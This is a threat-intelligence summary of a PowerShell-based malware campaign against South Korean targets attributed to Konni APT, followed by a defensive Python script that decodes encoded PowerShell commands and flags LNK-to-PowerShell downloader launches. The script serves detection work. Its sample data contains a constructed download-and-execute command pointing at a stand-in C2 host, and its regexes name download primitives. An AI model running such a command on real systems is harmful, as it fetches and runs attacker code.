Multi-Stage malware campaign targeting South Korean entities linked to Konni APT
2025-04-29 • Symantec
Broadcom described a multi-stage malware campaign potentially linked to the North Korean Konni APT group that targeted entities primarily in South Korea. The intrusion began with a ZIP archive containing a disguised LNK shortcut that launched obfuscated PowerShell to download and execute additional payloads. The final payload was a remote access Trojan that established persistence, collected system information and directory listings, and exfiltrated the results to a compromised command-and-control server. The report also listed Symantec and Carbon Black detections, including PowerShell behavior detections, malicious LNK classifications, downloader and Trojan signatures, and email-security coverage.
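A defender-side triage of process-creation records for the LNK-to-PowerShell hand-off described above, added here as an example and not code from the Symantec report: it decodes an -EncodedCommand payload (base64 of UTF-16LE) and scores the launch against the traits a shortcut-spawned downloader stage tends to show. The log records, file paths and staging URL are constructed for the example.

```python
import base64
import re
from collections import namedtuple
ProcEvent = namedtuple("ProcEvent", "parent_image image command_line")  # one process-creation record
# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Command-line traits typical of a shortcut handing off to PowerShell to fetch a next stage.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "exec_policy_bypass": re.compile(r"-e(?:p|x)\w*\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_primitive": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "inline_exec": re.compile(r"\biex\b|invoke-expression", re.I),
}
def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text (base64 of UTF-16LE), or '' if absent or invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""
def score_event(ev):
    """Score a PowerShell launch, inspecting the decoded payload as well as the raw command line."""
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    hits = []
    if ev.parent_image.lower().endswith("explorer.exe"):  # how a double-clicked LNK target is launched
        hits.append("spawned_by_explorer")
    decoded = decode_encoded_command(ev.command_line)
    if decoded:
        hits.append("encoded_command")
    text = ev.command_line + " " + decoded
    hits += [name for name, rx in INDICATORS.items() if rx.search(text)]
    return len(hits), hits
def triage(events, threshold=3):
    """Return (event, hits) for every event whose indicator count reaches the threshold."""
    return [(ev, hits) for ev in events for score, hits in [score_event(ev)] if score >= threshold]
# Constructed sample events, not data from the report; the first mimics the LNK -> PowerShell hand-off.
STAGE2_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s2')"
ENCODED_SAMPLE = base64.b64encode(STAGE2_SAMPLE.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS, f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED_SAMPLE}"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\patch.ps1"),
]
```

Only the first sample reaches the threshold; the benign Explorer-launched listing and the service-spawned script each score too low to be flagged.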